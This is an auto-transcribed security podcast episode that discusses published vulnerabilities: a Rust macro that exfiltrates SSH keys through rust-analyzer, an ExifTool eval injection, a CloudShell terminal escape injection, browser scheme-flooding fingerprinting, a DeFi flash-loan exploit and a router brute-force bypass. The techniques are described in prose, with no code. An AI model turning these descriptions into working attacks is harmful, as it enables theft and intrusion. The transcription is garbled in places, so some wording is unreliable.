Cross-Browser Tracking, Frag Attacks, and Malicious Rust Macros< Back to Episode Overview
This transcript is automatically generated, there will be mistakes
Hello everyone. Welcome to another episode of the day Zero podcast. I'm Specter with me is zi and this episode. We have some research on using deep learning to discovered vulnerabilities, cross-browser tracking, the fragmentation based Network attacks that were published last week and some unsafe rust code that hacks you and Soviet Russia. Before we get in the topics though, quick reminder, we are going on break for the summer after next week. So next week being May 24th will be our last podcast episode until September 6th. That doesn't mean the day Zero will go completely dark, and that we won't have any content. It's just that the podcast will be on break, but we might still have like discussion videos and streams and stuff like that happening. Speaking of discussion videos, we will also have a few discussion videos coming out this week. Talking about making the transition from CTF into real-world, vulnerability, research and exploitation. It's a three-part miniseries. Those will be releasing Thursday Friday, and Saturday this week all back-to-back. So keep looking for those So if that sounds interesting to you and with that said, we'll get into some of our topics this week. So our first one is a white paper, which talks about using natural language processing for doing static analysis and finding vulnerabilities which I know like we were thinking was kind of interesting zi because natural language processing as I understand it is usually used for like assistive technology, not really used. I haven't really seen it used in the context of like programming. There are just so operating on code before
it's usually used course with natural. You know, human languages. It's not so much he's with programming languages which didn't make this one stand out a little bit. I wish has a paper. They would have gone to little bit deeper on that, but it was still interesting unless you see the recent attempt to apply the natural language kind of training and all the theater that's gone into. The Exeter has been a ton of research in that area and just trying to apply to code and seeing if it works and It ultimately, it looks like, you know, they've had some success with that. I have some questions when it comes to like the whole methodology of the research. But ultimately like in terms of how they set up their study and structured at they were achieving you know up in the like 93% accuracy in terms of classifying cwe's Rama particular code, snippet or file. I say yes it has this vulnerability or no, it's not vulnerable which is a lot higher than I would have expected. Like I said, like it's normally used with morphe natural language stuff and yeah, I guess assistive Technologies like you said, but there are other places that could be used. Also text generation would be another Common Place.
Yeah. So we have seen some research papers before that have talked about doing deep learning for vulnerability Discovery. I think what this one brings new to the table is the use of the Transformer modules as they call them. Now, ai isn't really like deep learning in that isn't really my field, but I believe what that does is it basically transforms the input code into a model that can be used by by Burt or bi-directional encoder. Stations which they use to classify vulnerabilities and then they detect them using anti Estes sard or their software Assurance reference data set, which has like a mapping of cwe's to some example. Code that contains those vulnerabilities and I think they said the advantage of using the models that they do is that they're easier to train and they're also more accurate. So, yeah, I believe, I believe that's kind of what's new to the table with the paper. I did find that accuracy pretty interesting and the 90% range.
Yeah. So what they don't make exactly clear is what the data look like. They were actually testing against versus training, or if they're using the same, if they were still using, that's our data set. I've just pulled off this, our data set and this is kind of one of the problems that I somewhat, see with this, especially if they used. So, a common way, is you have your training data? You take a few out of it that are going to be used for the actual testing. So it's being trained on the ones that also gets tested on, but it's still the same data set, and I don't know, they make the argument that's more More accurate this way. But if you take a look at a lot of the samples, I'm just going to pull a random. See one up here. You'll know, it's like they're very small pieces of code. It's not representative of actual software in any sense, especially Law Firm that end up having like the good and bad. It's often just like there's like a removed line of code or something like that. Like the code is very similar, just obviously fixing the pain, really, which I mean make sense for the database or the data said, but when it comes to training on it, it does feel like it might not Like it might be over trained on to this particular type of data and I have been more interested in seeing how it applied to real-world source code. Like if it could actually discover vulnerabilities that were previously unknown, Yeah, I mean that
definitely be the next step. I can kind of see why you would want to do this type of testing at least for starting out, just to see. Okay, is this promising? Is it worth pursuing? But yeah, like doing it this way, with these limited code samples, it's not going to be able to really I have doubts that it will work too well, on a monolithic code base, which has a lot of complexity, especially with, like, C++ where you have so many different ways you can have indirect, And so I would be interested. That's another thing too. I don't think they really touch on it in the paper. I could be wrong. Maybe I missed it, but it would be interesting to see how well it works in comparison between C and C++. They kind of focus on C and C++ as a collective for the premise of the paper, but I can see something like this being far. More effective on a c code base. Like, let's say a colonel as opposed to a brat like a C++ code base, like a game engine or a browser or something. So that would be kind of interesting to look at two so I don't know if maybe those are in like the the next steps for what they want to do. But yeah I mean I think it's it looks promising as a paper but I just I don't think it's really a practical state yet and and I'm very mean that's what a lot of the papers are that we
cover. So did to be fair like it is research and like said they did kind of set out to look at that. Like can we even attempt to apply the text? The natural language stuff to this? And I think they've had Success with that like that it that is promising results. I'll say that much. I do feel like though they could have at least just try to run or maybe they did just had like terrible results and I didn't even include it out. I just feels like, you know, they've trained it on this, they should just be say like yeah. And and it also worked or also didn't work on. I guess that's that would be putting in bad light. Perhaps, they wouldn't include that but own I mean it seems like it won't even take. Take much extra work to set it up that way. Although that does mean that the code isn't self-contained. And a lot of what they're going to be finding here, kind of require that everything be in the same file. So that could also be just the place where it's somewhat limited but I mean like said it's research. There's definitely some promise here in terms of the result at least from this evaluation of
them. Yeah, so it'll be interesting to see if that research ends up bearing any fruit in the in the near future. All right. So with that said, we'll move into some of our exploits. Our first exploit is kind of a fun one. It's, it's rust hacking you instead of, you know, you hacking rust. It's it's basically stealing files from a victim's home directory, using rust, macros turning the, the rest secure Meme on its head a little bit, it exploits the vs code Editor to make this make answer macro that they wrote get expanded, which we'll call the Rita SSH, key function have which will find the user's private SSH key. If they have one and send it over a socket, in the case of the POC they make it, send to a local address but it could be sent to a remote address to. So when the editor runs the preprocessor for that macro that SSH key gets exfiltrated and, and it demonstrates that An attacker can make something malicious happen just by opening the project in BS, code.
Yeah. So that's kind of where the issue comes in. It's not so much the editor that has the issue. Like, it's not the S code with the issue. It's the rust. Analyzer tool that has the issue and rest, analyzer is the language server implementation. So you run, you run a language server. The editor connects the language server, and just kind of sense file sends what you're typing or whatever since queries over to it. And it'll analyze your code base. And two term, you know, what's a token or what something refers to all of that is done by the language server. That way the editor can learn about new languages without needing to manually Implement. Like every new language, the language designers can create their language server. So the issue here is the fact that these processor macros, they're meant to be executed at compile time. So if you were compiling this, that code should be executed. That's fine. It's a security Risk by you kind of understand that it's the fact that it will also execute them during that analysis phase. When you're just looking at the code, that's where I think you could argue. Maybe it shouldn't do that, or should be documented that it will do that something like that. But this case, because of the fact that does execute it, while doing the analysis pass just to figure out what things refer to. That's where it's able to execute the code and just opening within vs code or within any editor that uses that
language server. Yeah, so like I said here there, exfiltrating an SSH key in theory, you can basically do anything though with this kind of attack, you could exfiltrate other files or just like Papa shell or whatever. So yeah, the pockets opens, fairly innocuous but it could be used to, to do some serious damage. I mean, you have seen cases where malicious projects have been used to try to attack people with the North Korean State actors. They were sending malicious. Will Studio Projects, I forget exactly what they were abusing, but they were abusing a feature of Visual Studio, to pop a shell, or get code execution on a victim machine when they open to be S by malicious vs project. So, I mean, this may seem a little bit silly but it could absolutely be used in a practical attack. We've seen it before. So. Yeah, and because it affects the language server, it could potentially affect other editors as well, not just vs code. I don't think they really talk touched on that too much. I think they Like mentioned it in passing but they haven't really tried it on other editors. But yeah, I mean scary out there. What can happen with language
servers? It's an interesting attack surface. I am wondering though, why they chose to excel the file rather than, you know, doing the demo popping a shell. And I'm not sure if there are limitations on the type of code, that can be executed within the processor macros That might be why they only try to Excel file rather than popping a shelf. So there might be limitations there, I was looking into it. I couldn't find anything that actually indicated that the only thing that seemed to be the case is that hat actually return like a token stream. But it is something I'm at least wondering about because it does seem like an interesting choice to not pop a shell, which just kind of implies everything
else. Yeah, popping a shell is way more fun. I did just want to address something from Chad quickly. People asking about team sir. So yeah, I know team star hasn't been on in a while, it's just because I've been busy and have been able to do the PS4 streams. He hasn't been on the podcast. We thought about maybe bring him on at some point but yeah, hopefully team star will be on again soon. It's just, you know, it's been a little while it's been a bit crazy for me. So so that's why I didn't want people to think that, you know. Teams are just went and abandon us or something. That's that's not what happened. So all right with that said we can move in to get lab. So get lab is in this. Week's episode through a core. One report from backs, the issue is code injection, through lack of validation of image files. Provided from get lab work horse, that gets passed to XF tool, which is used to remove tags, that aren't explicitly marked as loud. Now, this seems to be more of an issue in XF tool than a issue and get lab. So but I could kind of see how you can maybe put a bit of the blame on both but mostly I think it's an excess of
12 probable death lipase out for vulnerabilities. Even if it's not within their own code, they pale 50% although they are actually looking to change that that was raised in the comments actually to this one that they pay out 50% or normally would, but they're looking to change that so that's why it's getting reported to get lab is because it all It does still pay out like in advertised 50%, even if it's not their
code. Yeah, so the major problem with X of tool is when it takes files, it doesn't properly. Check, it doesn't like really factor in the file extension. It'll try to automatically determine based on the file contents. What it is. So if you pass a malicious file that with like a PNG extension, even though it's a PNG extension if you make it look like a day g a date DJ Vu. That's that's weird for me to browse for some reason a prodigy from oh Deja Vu. Yeah, we'll say that. Deja Vu file. It will get parsed as Deja, Vu not as a PNG image. And that file type is kind of special because it has some very interesting features from an attack surface perspective. One of the things it can do is it can convert see Escape sequences but
the well I don't think that's necessarily to interesting of a feature like the fact that they escape the Cs, it's more the fact that Since they're in Perl they do like using kind of the easy way, they toss the token that it's parsed and in order to remove the see Escape sequences, they run it through eval and pearl which is obviously a dangerous function. It could be used in this way and they do a check here to try and make sure things are being escaped. So you can't just like inject a quote but I mean, it's, I don't know. I mean, the fact that c Escape sequences are supported is into interesting of a feature, like it. Not some that just stands out is, okay, that's going to be vulnerable to me, it's just kind of a benign, it supports act. I mean a lot of applications support It's Gator, like doing those sorts of Escape
characters. Yeah. So the problem is because you can break out of that escape sequence you can inject arbitrary Pearl which Pearl you basically get code execution and that can let you get a remote shell, it this kind of reminds me of like those. Do you ever remember those like really old Visual Basic like tutorial style projects where it's like they show you how to write a calculator and they're like just pass it into eval or whatever the equivalent wasn't be be the Like, kind of like that. It's just exploiting a lazy usage of just not wanting to put in the work to do it properly and safely. It just throwing it into a vowel
like throwing it into a Val. I would rather do that than try and custom Implement that. Like, I like I get it's an anti pattern. If you don't want to actually be like using eval, it's better. If there's some other language feature for supporting just like those minor changes, like python exposes the converter directly that's said. In this case, we should also mention like the Escape happens because of one issue where you'll notice the example metadata on screen here goes copyright quote backslash and it's this quote or yeah backslash new. And quote, that kind of breaks the issue or causes the issue because it's looking for that quote already be escaped. If that quote is escaped, then it will, you know, pass it through into eval. The problem is that backslash is actually escaping the new line, not the quote, and it's not quite take that into account. So I think's the quotes been escaped when it when it actually hasn't that's, they can escape the dot to append or Or concatenate another string. And that's where they do their actual execution in. So, I just want to call where the issue actually happens, like, in what? It's not checking. They've just kind of mentioned you can escape without actually going to the details.
Yeah, so after they demonstrate that, the issue is exploitable, the way they do that is they get a shell and they dumped some command output including a process listing. So yeah. Like we said the bug is more an exit tool than anything which I think they did independently patch though. They didn't credit the researcher, who reported it to get lab nor did they request a CDE? And I wanted to kind of call out get lab here because they did something really cool they filed for a CDE. So on behalf of the researcher and they also paid in the 20K Bounty. So yeah, like they didn't really have to do that to go and get an issue, but they wanted it to be known that there was a security issue that you should update and to get the research accredited. So that was pretty cool, on, get lab. I think, I just wanted to call that out quickly. But yeah. Pretty pretty interesting bug.
Yeah. Like it's a simple bug and like you said, Using eval isn't like the best idea of but it makes sense to try and do some. That's already built kind of do that. So I like using eval is definitely a common pattern. Probably not something you should do but like it's also the type of thing. You don't want to code yourself.
Yeah, I guess if you're ever going to have to use eval or you feel like you want to use it just you just have to make sure that you absolutely a hundred percent, trust the source going into it. You, you just have to be like very Vigilant whenever you're using that. It's like a big red flag. So, Alright next we have a project zero report that got this closed last week with an AWS Cloud shell issue that was fixed back in. March, the issues in the terminal emulator when it tries to handle DCS Escape codes for the ace term Library. So when it encounters, one of those codes, it will intent to send the parameter that's attached to it into the terminal input Handler. And because you can pass multi-line strings in for that parameter, you going to be used that to get command injection in the terminal. So the example they give is if you curl away. Page that has a malicious payload with that escape sequence in it. You can run a command that will create a file. For example, when the user gets the curl out, put in their terminal. So that's kind of what's important. There is the fact that anything going into the terminal not just input is evaluated for those Escape sequences and can be exploited. So just like as long as an attacker can get malicious output into your terminal. That's all they need to take over at
basically. Yeah, and I found a kind of interesting that the, this thoughts, Send would ultimately lead into like the terminals input. It's kind of dealing with, you know, displaying the output. Although it also kind of makes sense in the idea that your Your input or output. Like it's all kind of just coming through as a data stream that it's displaying, however, it's supposed to. So like a kind of makes sense that it makes its way in there, like I could see a path but it wasn't intuitive to me. That that would be the case and he had this case. Like almost all the other Escape codes, you can scroll up through the code, they kind of set off with that parameter. Is that gets passed through when used in. Send this one in particular, it just sets it up as this Tucker and parameter and reflects it right back. At the output which makes it vulnerable. I love the kind of attack service, just being like curl up a dork. Add a file and you're able to get code execution though. Like that is a I guess a fairly fun way to attack
someone. It's not really one that I've seen in other issues really so it's kind of unique in that
respect. You'll see when we talk about like the curl issue. Sometimes were if you curl the right page, you can compromise curl and get your code execution that way like Talking. Somebody using those sorts of applications is there. We have covered some cases of it. This one, too. Just the fact, I guess. Also, the fact that such a simple, like, it is kind of the more traditional command injection, rather than, like, just a full-out exploit or memory corruption type
issue. Yeah, for sure. So, it's a cool issue. It's also a great entry point for an attacker to get into an AWS instance, because well, it's a Management console. So it's also fairly high impact if you do get hit with it though. It does obviously require some interaction in order to exploit that. So, that is a bit of a mitigating Factor. But, yeah, I mean, overall, I think it's a cool bug
and I'm not sure how soon this one is to actually get patched either. I guess they do say fixed so that might be in the AWS deployment itself but the lip term dot JS here like being used by Cloud9. Last commit was 2016 and this is the master Branch. Like the whole repo has been archived that said I guess. Most likely case is AWS is running a fork of it and not actually the old code.
It is an interesting point to bring up though, because anything else that is using lip term, could be vulnerable to the same attack. So this would be a good thing to look at if you're looking at a Target that, you know, uses a Sturm. So yeah, that that's a good point to bring up. Yeah, it looks like it was, is fixed pretty quickly. And like, you said it, it must have just been fixed in the ews side. It was fixed at least given the timeline in the comments is fixed with in like four days. So, All right. So we'll get into our big fish topic of the week, which was across proud cross-browser tracking. So this was the vulnerability disclosed by the fingerprint J's, which affects multiple browsers, including Chrome Safari Firefox and by extension tour as well, and it can be used to identify you even if you have some sort of barrier in place like like a VPN because it's creating an identifier, using the browser itself and how it does that, is it uses application URI schemes As a sort of side channel to check if user has a given application installed. So the example they give their is like the Skype you were I Handler they'll try to see if they can launch Skype if they can't and it says like it doesn't exist or whatever Behavior the browser gives because it varies browser to browser. The browser has
like three of the four that they tested with. I don't think they actually mention exactly what if Chrome did that or how Chrome's were they give some details but I feel like it's missing because they talk about the PDF thing with chrome. Yeah. Anyway. So for Firefox Safari and Tor Browser, which is built on our Fox, what would happen is if you had somebody didn't understand, it would open up, this are page and that's an internal error page. So if you try so if you're the opener you've opened this pop-up it goes to like your slack or whatever application and it goes to that are page. You won't be able to access access that page because the same word Policy. But if a, if you try and open a Handler or a custom scheme that does exist, it'll hit the about blank page that shows you that little dialogue, you know, deal approve, opening this application. I'll show you that dialogue and shows you that on Annabelle blank page which will be stove so that you can access that through like the opener. So that's how they could detect whether or not popped up. Interestingly because Tor Browser doesn't show you those prompts it just disables on by default pretty much the attack. They use rather than using a pop-up or they were able to just use an iframe to check act, which made it a lot more silent because it would out. It would just hide the page for the most part. You just have the little iframe in the way. So that was kind of interesting tasks that the fact that toward Was there ended up being easier to compromise our quieter to compromise? I guess. Because that's kind of the big issue here, is the fact that you're opening pop-ups, you're testing all of these URLs. Every time that's just going to be loud on any user. And I guess touching on chrome chrome, had a little bit of protection where you have to have some sort of user interaction with the page before he could just open another. So it's before he can actually do pop-ups in general, but In this case, it also help protect against opening, the custom protocols. So to get around that, apparently, all you have to do is trigger the PDF viewer, and that will basically disable the entire protection and treated as though, there was user interaction. Which I mean, there's obviously a reason for why they did that.
It's just weird. Yeah. So any extension can reset that flag and and that's because they have to be able to open custom URLs as per the specification. So the reason they went up to the Pediatric viewer was because it was built in. But in theory you could have hit like any extension or abuse any extension that the user would have had installed. Yeah
point I wasn't thinking that extensions could also register themselves as handlers for those
protocols. Yeah so yeah that's a solid this
I don't think we mentioned in Chrome actually how they detected whether or not it opened. They only talk about this. Like this PDF trick that they use and then they talk about that is how they could open it. And then Firefox, Safari Tor Browser, they don't actually mention how they're detecting it on Chrome. So I assume Chrome has the exact same thing, internal error page about blank for the prompt. But I've not actually confident in that and this right up, I don't think actually states that explicitly or I'm just missing
it. Yeah, I do wish they were a little bit more clear and like methodical I guess when I came to the browsers because they talked about the differences between them, that was there like main point of that section was saying OK. How like what were the unique challenges I guess presented with each browser which is cool but it would have been nice to see a summary of the attack being used on each browser but yeah, that that's not really there. I did also want to call out tour while they were able to do. Silent attack with the iframes, it what? There was a little bit of a mitigating factor in the way that torque took a pretty long time to exploit the vulnerability. They don't really go into many details on why that's the case. But they said it could take up to like 10 seconds per application that you wanted to check, which they do have kind of a workaround for and that's by tricking the user into using a gesture to run the application test like a click event or whatever and the example or like a carrot typing characters. So the example they give their There is like fake captcha but yeah tour. It was a little bit strange and how it was almost like rate limited and how much you could do it because of how slow it was. But yeah, but I just Probing, for applications on a user, you can kind of build this unique identifier and they call this scheme flooding. As a bonus, they point out from an attacker perspective. You could also use this to profile your targets by checking for certain applications. So if you have applications that like regular users wouldn't have like a postgresql server, they can see if you're a developer, for example, or if they check for some kind of government software, they can Check if you were a government employee. So it was kind of interesting in that respect to, you could use it in two ways. You could use it to build the unique identifier, but you could also use it to Target your attacks. So I thought that was kind of a cool aspect.
Yeah. The whole attack itself is just kind of a crate if you use of the schemes that get registered. I mean I think it's an interesting attack like I said early on, it's kind of loud. Like it is opening a little pop-up there, every time I think it definitely. kind of trigger something, but then it just stops and you don't really notice It but the fact that it does that it does take a little bit of time even even when you're not on the Tor browser on any of them, it takes time to test every application. So like because of that I don't see this gaining widespread adoption but it is still an interesting attack. Like you can fingerprint a user base off of it and it works regardless of what browser you're currently using to fingerprint the specific
device. I love these kinds of browser side channels. We've talked about a few of them before I forget, I forget the exact specifics but I remember we talked about one that had to do with like abusing the canvas to profile, the user's screen. I just love these kinds of browser side channels are just so creative to me and it's fun to see how they can can be abused as of yet. Only Chrome seems to be actively trying to address this issue, at least. When they I wrote this. There was nothing indicated by like Firefox or apple for Safari stating that they were looking into how to address this or mitigate it but I think they did say Chrome is actively working to fix that and they might have already done so by now I'm not sure I hadn't looked into it too much. But yeah I mean it's a cross-browser tracking is pretty
important that's kind of how I read this so what's that only Chrome seem to already be aware of it? For they serve reporting on it because Chrome's flooding like acknowledgement of this goes back to June 2020. So it seemed like, you know, when they're talking about that's not so much that the other browsers won't be doing anything to protect against it, but that Chrome was already aware of it. I might have been mistaken about that, but that was at least my reading. It seems like, yeah, the bug on like Mozilla was only open four days ago. Whereas the Chrome one goes back like set to
June. Sorry, I was just taking a quick look. They do have Links at the bottom of the post to the reports that they made. So that's the one you were talking about with June and 2020 on Chrome but it was it has had activity as of like four days ago.
Yeah. What I'm saying, is it sounds like Chrome was aware of this before. It's like, they didn't open the Chrome one. They opened the Safari and Firefox ones. I don't know, I guess Safari like doesn't work, but because it's the Mozilla bug that was opened only four days ago. The Chrome bug though that was opened back in June. Oh, I see. So that's why I'm saying, like, when they're talking about it only seems like Chrome was aware of it. It seems like that's because Chrome was doing something about this before fingerprint dot JS. Ever. You know, came up with this attack or reported this attack, whereas Firefox is only acting on it, you know, now that they've been made of water of it. Yeah, so this kind of reflects
well on on Chrome and this has been the case. I think with some of the other side channels we've looked at two, I don't know why. But it seems Chrome has always been a little bit ahead of the game when it comes to trying to mitigate these side channels. I guess that's just because Chrome is such a such a big player in the end the browser Market especially now where it's being used by like Edge to. But well
there's that I mean the fact that Google is an advertising company. Just Chrome. It's a more they could lock other people out from doing the fingerprinting so that you have to rely on Google to do it. The better it is for them so like they do kind of have a vested interest, despite the fact they do advertising do that tracking to actually make it harder for others to do that same
thing. Yeah, it's a fair point. It's in their best interest. All right, so we have cryptocurrency appearing this week in the form of the FAE protocol used in decentralized finance or defy. I want to State up front before we get into it. Neither zi or myself have experienced with d Phi and this bug is a logical issue in smart contracts. The write-up goes into a lot of terms that seem a bit alien. If you're not into the financial area, like flash loan, driven Market, manipulation and slippage tolerance. So it is, it is going to be a bit of a tough one to cover, but yeah. This one weighs a.
Yeah, it's crypto. It's definitely not an area have a lot of background in. I have like casually looked at a the occasional D app vulnerability but it's not an area really no. No. Too much about by will say kind of the key background with the stack and what makes us. I guess it doesn't make it interesting but side effect of this the Bounty reward on it was eight hundred thousand dollars paid out in tribe but still $800,000. That is as far as I'm aware, like the biggest bounty.
Reporter. That's got to be the biggest anti payout. Yeah.
Like like for a single thing, that is a huge Bounty. Oh, so anyway, he Concepts here, Specter, just mentioned, like, flash loans, all idea of a flash loan is a small loan or not a small loan loan that happens really quickly so you can take out as much as you want up to your like the limits. But it must be paid back within the same transaction that it gets boring to. This is using like a DF. or like a smart contract where I'm for people saying, no way on the 800,000, I mean this would have allowed on the Specter. You did the calculation on it, didn't you? I think he had into the note. After this have gotten,
if this was attacked by somebody malicious, this could have resulted in a compromise of over 200 million dollars. So 800k in the grand scheme of theme of things is really a drop in the bucket compared to what could have happened if this was exploited.
Yeah, it's so. That would have been like 60,000, ET H, which is kind of what you make with this. So, touching off flash. Loans like, said happens within one of those smart contracts. You have to take the money out, spend it do whatever and return it all in one transaction. If that doesn't happen, the whole thing is rolled back and nothing ever happened. So flash loans are called that because they're very quick, it happened, you know, in a Flash and one transaction, their kind of atomic, there's no real risk of losing your funding. He put the money in and they'll usually charge like a little bit to make a profit off them. So where that comes in the fire protocol I'm saying, fi I'm not entirely sure if that's how it said or if it's like fee or something. So you kind of leave that, it's a stable coin, so it's pegged to some value to kind of give it a controllable Valley. It's not going to fluctuate like bitcoind. It will algorithmically try and control its own value or called a protocol control value. And to do this at all, it has a pair on units while just like a place where you could swap between different coins. You put a bunch of liquidity into a giant pool and people can just like by your coin whenever they want or you can buy back the coin and it will also if the value of the coin goes too high, it will start selling off cheaper coins in or drive the value back down. So, what it does is that it has this bonding curve contract, Where it will sell off newly minted coins. If the price goes above $1, o 1, then it will just sell off on that bonding curve being like yeah, you can buy newly minted coins were Del Oro. One, no matter what the other price is and that bonding curve holds on to that money until somebody calls the allocate function on it when the allocate functions called it goes and checks the prevailing price on Eunice Watusi. Hey what's going great here and ads in all that e, th back into the liquidity, pool. Does the tool thing there and it sells it off of whatever the prevailing prices to get the fee coins or five coins back when it does. That it also is willing to accept like a hundred percent slippage, which is just like the amount of price change that could happen between what you set, your transaction act and what it actually goes for. And one of the issues there is the fact that does check the prevailing price and then puts it on the market at whatever that right is. So that something that you NE swab actually mentioned is that you shouldn't you have to be careful to basically add tokens at the right price and you shouldn't do this in a smart contract. So allocate does check to try and make sure it's not being called during like a contract. However, there's a problem with that allocate function. That was meant that if you called it in a contract, but do it during the Constructor of the contract or in part of the transaction? I frankly, I'm not exactly sure where the construction Constructor happens, obviously the start, but if you call it in the Constructor, It'll like you call allocating the middle the rest of the smart contract. So they were able to kind of attack with the price was that it was going to sell. Coughs of the whole attached here. Putting everything together. Oh you'll flash, borrow some e, th use that e, th to purchase fie on you. NE swap that's going to drive up that market right getting it to like, you know, dollar 20 or something or something. Hi, whatever it is. Once it's pumped up, you can go to that bonding curve and buy a bunch of Phi edges. The dollar. Oh, one, so now you have a bunch of Phi and the bonding curve has a bunch of money so you can trigger that allocate call you know add that liquidity back into Eunice wha Trying to buy back the five coins there at this elevated price. All this 5iq bought especially that $500 o1 you can now sell it right back to the five protocol at this elevated price profit off of it with all your new e. Th repay your flash loan and pocket all the money off of it. So the calculations figured out if you were to abuse basically every flash loan available, you'd be able to get away with about 60,000, eat eh.
Yeah, it's basically money printer Gober with this
scenario pretty much and I guess I will mention like flash loans. Sounds kind of weird. It's normally used for like if you notice a price difference between two, crypto coins on different markets, you can use that to expand your gains off of take advantage of that price difference. That's usually I believe where it's used. Is kind of for that Arbitrage just scenario. Yeah, but in this case, you know, it just funds the capital-intensive attacks which also seems to be the other use case for Flash
loans. So toward the end, they go into some detail on what the best practice should have been here, which is you should use an oracle, as well as the slippage tolerance. So that, you know the price you're getting from the Oracle isn't being manipulated or at least you can mitigate its manipulation when performing these kinds of swaps. So the fix was kind of a two-part. Fix one was to change the way that ethereum was deposited into the protocol. It's no longer supplied to the unit swap pool instead. It's Where is directed into a dedicated Reserve stabilizer? Which can set some like card limits on the on the price of Phi. And the other fixed was to use a 1% slippage tolerance which before the function was like a hundred percent slippage Tolerance on allocation. So, that's kind of the other mitigating Factor overall, though, this entire class of the tax, or this Vector of issue should be killed with these fixes. But yeah, I mean, this has got to be the most impactful issue we've ever covered on the show. Show. Fintech is just crazy with how much money gets thrown around over there. It's a very big industry and it, that's why originally, when I saw it was 800k, I was like, wow, that's crazy. But when you look into the actual issue, it really doesn't seem that crazy of a payout, it makes sense.
So, like, especially when had that's been abused. Not only would they have gotten away with a lot more. Money would have destroyed trust in the entire coin. By AK would have efficient a much larger problem than just the money like it would have killed the coin. I mean, there are questions about whether or not these stable coins will really last because like historically stable currencies have always been broken like the gold standard with the US dollar and their Swiss franc to Euro things like that. Like they've always been broken. So there's thoughts that that's going to be the same thing with, you know, any of these cryptocurrencies but it is yet to be seen But ignoring That aspect, you know what? I've been an early demise I
guess. Yeah. It's a big problem because when you're talking about these kinds of markets anything that gets traded against that is impacted. It's kind of like everything gets tainted around it. So yeah like I said I think this is probably the most impactful issue we've covered.
Yeah, although that is also kind of an argument I still why something's really big attacks don't end up happening because it undermines all of cryptocurrencies. So it's like you end up undermining the value of whatever you stole.
Yeah, it's almost against your best interest in a way. It's kind of interesting in that way. Yeah,
yeah I think Satoshi whatever like the guy who did Bitcoin in the white paper actually called that out it's like a security feature in a sense I think it was in his work might have been somebody else's but yeah
with cryptocurrency there's so many white papers and stuff. It's it's hard to say But I yeah well we'll move crypto side and we'll move into our next topic which is a security assessment of
But yeah, still, I mean, still more than a lot of places would pay out for a user interaction access
but yeah. Yeah. Sorry my notes were a little bit out of order. I think we're back on track.
So we have one more action, which is the D-Link router
issue? Yeah, that's where I was going to go to next. So yeah, this one's another kind of quick one. It's in the it's a D-Link router vulnerability in the Der 842 routers after this researcher bought it and did some initial research, the author discovered they can enable telnet in the admin panel and connect to it with the admin user credentials. So in that sense, like obviously if you already have the credentials, getting a shell was pretty easy. But they decided to look at tone that as an attack surface to see. If there were any issues, it could be exploited. Um, without having the credentials obviously, and it's kind of an attractive attack surface as the researcher points out because it can be hit remotely, right? It's telling that instead of focusing on mem corruption, he focused on looking for a logic issue, which he did find one. It was a Brute Force, protection bypass. So, when logging into telnet, it'll try to somewhat prevent Brute Force by trying to rate limit, how many attempts you can make. And the way they do that is they make it expensive to have failed. Login request. It's because it would have this artificial three second delay. Before would tell you that it actually failed or disconnect, but there was a bit of a side Channel exposed because a successful login would usually reply with a welcome message within point zero five seconds or so. So after that time passed, you kind of already knew it was a failed login. Even if you didn't have the, the message or the disconnect to tell you explicitly that it was failed. So you could just like, create new connections to keep trying that. And because Delay was on a per connection basis. It's not like a global cooldown. You could literally just keep creating connections and try as many times as you wanted. So, by continuously spawning connections, trying to login credentials and using that .05 second side Channel, you can bypass Brute Force, protection that on its own isn't gonna bleed. You to be able to pop the router immediately from an attacker perspective. They do still have to Brute Force but it is by passing a protection. That's in place. So I think the the cve is Kind of fair in this case. Yeah. Usually
like Attacking over the network and brute force over the Network's going to be slow. It's not a great option. And the majority of cases being a router, you're probably on the same network. So you are going to be able to take advantage of like, you know, full Wireless speeds. Presumably. I mean, I imagine if you're an attack, I mean I guess you could be attacker. Also wired into sagging like full gigabit speeds or something against the router. You can do a lot of attacks a very quickly that way. In fact, you're probably going to be more limited by the router CPU than anything else. As a network tactile like real for Sarah just isn't a great option. But this is something I've seen also on like web forms, where they'll just sleep to add in that delay. Not really understanding why the delay should be there like with password storage. You shouldn't be doing like just a salted hash or something. You should be using a hash that actually takes time to compute exactly how long will. And on what your security considerations are. But like the computation itself should be what takes time to slow down the attack. Not this sort of artificial introduction of a delay So I mean I thought it was still an interesting attack to talk about. Although the practicality looks at over the network just isn't a great option regardless although maybe they're likely to also using a small password. Otherwise, like, you're still going to be fairly limited and it's still going to be pretty loud on the
network. Yeah, and you're not getting like an immediate compromise, so it's a fairly low impact issue, but it is, it is interesting in the way that it shows that the the protection they had in place was kind of use not really useful. Yeah. It was just kind of thrown in there and maybe if you looked out of the service levels and attacker you would get bored and and go away. But if you actually looked at it and tried to get around it, then you could pretty easily. It's almost like Falling into security through obscurity, category and that respect in my view, but yeah. And now we'll move into the open security assessment from Keen security lab on Mercedes-Benz. In this report, they detail some background research on the car and the architecture of the infotainment system and whatnot. They also discovered five vulnerabilities in the high Q. Net protocol three of which were in the infotainment, ECU called the head unit and two of them were in the Hermes module or the tea. ECU which provides the head unit internet connection, and receives vehicle vehicle commands, and stuff like that. This report is very long at 91 Pages. It's mostly just background information though, on the environment, as well as some various tax services and some post-attack things you can do.
Like, my thighs are reading. This was honestly that if somebody wanted to get into the car hacking, this might not be a bad place. Look now, I don't know, enough to say how applicable like the Mercedes research is going to be too like some Our vehicle. There's obviously going to be some similarities, but they do talk about like how they set up their test environment, their testbed, the general architecture. They're dealing with like you said, there's a lot of background here and I think there's a lot of useful information out of chat shouting cop. Also just mentioned the car Hacker's handbook which another resource. I'm not sure how well it's aged would be my only concern on that one. That said like I don't know enough to actually make the comment. On whether or not it's worthwhile but that is another resource out there. This one, being I guess a bit more recent and more Practical. Look at something. Yeah, I don't know. I mean it's an interesting free right up. There's a ton of information here. I mostly just focus on the vulnerabilities that they found in the high qnet protocol, but they do go on a little bit more into more detail,
